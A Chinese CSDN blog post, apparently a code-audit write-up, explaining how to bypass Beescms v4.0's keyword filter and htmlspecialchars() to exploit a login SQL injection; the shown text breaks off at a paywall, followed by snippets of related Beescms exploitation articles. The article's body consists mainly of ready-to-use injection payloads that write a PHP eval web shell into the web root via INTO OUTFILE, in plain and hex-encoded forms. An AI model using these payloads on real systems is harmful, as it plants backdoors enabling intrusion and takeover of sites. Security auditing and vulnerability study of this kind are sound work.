mysql注入审计_【代码审计】对Beescms SQL注入漏洞的进一步思考

最新推荐文章于 2024-02-06 20:39:57 发布
最新推荐文章于 2024-02-06 20:39:57 发布
阅读量339 收藏
点赞数
文章标签: mysql注入审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35638218/article/details/113460587
版权

0x02 Mysql注入的一个特性

上篇分析到,由于函数fl_html()的影响,其实就是php函数htmlspecialchars(),导致不能写shell到目标机器。其实这里利用Mysql注入的一个特性就可以达到注入的效果。即对shell部分进行Hex编码,或者用mysql函数char()就可以轻松绕过这里的限制。

方法一 hex编码

我们写入shell的语句是:

[SQL] 纯文本查看 复制代码user=admin' uni union on selselectect null,null,null,null,<?php @eval($_POST[a]); ?> in into outoutfilefile 'D:/xampp/htdocs/beecms/a.php' --%20

对shell部分进行hex编码为,这里我们采用Python简单编码:

[Python] 纯文本查看 复制代码>>> '<?php @eval($_POST[a]); ?>'.encode('hex')

'3c3f70687020406576616c28245f504f53545b615d293b203f3e'

写入shell的payload为:

[SQL] 纯文本查看 复制代码user=admin' uni union on selselectect null,null,null,null,0x3c3f70687020406576616c28245f504f53545b615d293b203f3e in into outoutfilefile 'D:/xampp/htdocs/beecms/a.php' --%20

记得在编码转换的时候前面加0x或者直接用函数un

最低0.47元/天 解锁文章
Eric Q
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php is_numberic函数造成的SQL注入漏洞
09-04
然而,如标题和描述所指出的,不当使用`is_numeric`可能会导致SQL注入漏洞,这是一种严重的安全问题。 一、`is_numeric`函数详解 `is_numeric`函数不仅会识别整数和浮点数,还会接受以数字开头的字符串,比如"123...
【beescms】命令执行、报错注入
qq_51979295的博客
09-28 626
pwn的题死活下载不下来,今天写点别的,还有点别的洞没写,改天补上
对beecms网站进行SQL注入和文件上传的报告:
weixin_73760178的博客
09-11 508
在这里可能会出现解密不成功的情况,那就是有可能是该代码的字符限制在了32位,没输出完,那么我们需要使用sub是、tr截断函数进行输出。如果发现没有SQL注入的,但是又没有验证码,那么就可以进行bp的intruder部分进行暴力破解——如flyocms2.0.6。在此不好使用联合注入,因为后面的limit的限制,但从中可以看出它报错报的很详细,所以使用报错注入。是对网站进行识别(识别指纹),也就是确定此网站是php的还是什么,根据指纹查找历史漏洞。通过查找它的源码,确定它的绕过规则。
模拟攻击beescms框架网站,并且一步一步渗透测试,上传shell,连接蚁剑,拿到对方网站根目录
weixin_52149916的博客
11-06 768
观看页面功能发现有文件上传,测试有没有上传漏洞,在网上寻找资料发现我们直接可以通过http://IP地址/admin/admin_file_upload.php来到文件附件上传界面,并且它允许PHP格式文件那么直接上传shell脚本文件发现上传成功,连接蚁剑。发现有4个参数有user,password,code,submit,把submit=ture修改为submit=false验证码就不会刷新了就是284c。发现密码不完整,用substr函数截取后面的 '~53b01a0eb~'开始攻击发现爆破不出来。
0x2B.BeesCMS系统漏洞分析溯源
qq_31679787的博客
10-23 795
通过使用御剑扫描得到了后台页面,测试了一下admin/admin,发现能够登陆,存在弱口令; 登陆到后台页面,发现操作系统是linux,开始寻找能够上传shell的页面; 寻找后发现,后台的功能都不能实现,但是在报错信息中能够得到网站目录为/var/www/html; 查找资料后发现在登陆界面存在SQL注入;在admin后加'测试,发现页面报错; 通过order by测试得...
SQL注入讲解-BeesCMS系统漏洞分析溯源
最新发布
Ryongao
02-06 1340
本文章仅限于网络安全教学,严禁用于非法途径。若有人因此作出危害网络安全行为后果自负,与本人无关。
SQL注入漏洞演示源代码
09-13
SQL注入漏洞是网络安全领域中的一个重要话题,它...通过研究这个源代码,开发者可以提高对SQL注入漏洞的认识,从而在实际工作中更好地保护自己的Web应用免受此类攻击。同时,这也为网络安全教育提供了宝贵的实战材料。
SQL注入漏洞全接触.ppt
11-15
* SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及服务器的信息,从而获取攻击者想得到的资料。 二、 SQL注入漏洞的危害 * SQL注入漏洞可能导致敏感数据泄露、服务器被入侵、网站沦陷等严重后果。 * ...
信息安全_安全编码之SQL注入.pptx
08-14
有效的代码审计可以帮助发现潜在的SQL注入漏洞。以下是一些建议: 1. 检查接收的参数是否经过适当的过滤和验证,确保它们不会破坏SQL语句结构。 2. 通过分析SQL语句中的关键字,推断出可能的变量来源,从而找出潜在...
BeesCMS的SQL注入漏洞
Ms08067安全实验室
08-06 3538
本文作者:arakh(MS08067实验室Web安全攻防知识星球学员)根据星球布置作业,完成BeesCMS的SQL注入漏洞过程如下:1. 扫描后台 获得后台登陆地址:2. 登陆后台...
SQL注入绕过实战案例一
weixin_51525416的博客
09-05 1494
SQL注入绕过实战案例一
BeesCMS系统漏洞分析
weixin_47493074的博客
09-25 2394
BeesCMS系统漏洞分析
[代码审计] beecms 4.0 漏洞总结
shawdow_bug的博客
09-24 4542
beecms漏洞
Beescms_v4.0 sql注入漏洞复现与原理分析(白盒与黑盒)
不想当脚本小子的脚本小子
12-27 2473
一、漏洞描述 Beescms v4.0由于后台登录验证码设计缺陷以及代码防护缺陷导致存在bypass全局防护的SQL注入。 二、漏洞环境搭建 1.官方下载Beescms v4.0,下载地址: http://beescms.com/cxxz.html,然后解压压缩文件,然后把文件放到phpstudy的网站根目录 2.浏览器访问http://安装目录/install,开始安装 一直下一步出现如下界面即可安装完成: 安装完成后修改my.ini文件,在[mysqld]后面添加secure_fil
网安学习-代码审计
weixin_44770698的博客
07-07 1019
网安学习-代码审计beescms
掌控靶场 尤里复仇回归sql-注入绕过防护getshell
sagat110的博客
12-27 539
央企扫地僧重拾渗透,在掌控学院的靶场练习闯关过程中,记录一些心得体会,信息收集、sql注入、弱口令、一句话木马等手段的综合利用,成功拿到flag
Beescms_v4.0 sql注入漏洞分析
WY92139010的博客
09-25 3432
Beescms_v4.0 sql注入漏洞分析 一、漏洞描述 Beescms v4.0由于后台登录验证码设计缺陷以及代码防护缺陷导致存在bypass全局防护的SQL注入。 二、漏洞环境搭建 1、官方下载Beescms v4.0,下载地址: http://beescms.com/cxxz.html 2、解压压缩文件,然后把文件放到phpstudy的网站根目录 3、浏览器访问htt...
php 3.2 get order sn,beescms 3.3 /mx_form/order_save.php SQL注入漏洞
weixin_29668665的博客
03-27 122
"""If you have issues about development, please read:https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.mdfor more about information, plz visit http://pocsuite.org"""from pocsuite3.api impo...
代码审计】小白友好的根据CNVD审计BEESCMS
uuzeray的博客
01-29 1548
我们就用刚上传的一句话木马试一下:upload/img/20121208/201212082353104864.php。看起来有很多,但不少include的参数已经写死了,这些我们就不用看,我们需要找可控变量。访问一下/admin/admin_channel.php。找到/admin/admin_channel.php。访问/admin/admin_pic.php。回到/admin/admin_pic.php。直接用第一个/admin_ajax.php。跟一下$value,发现是全局且可控的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值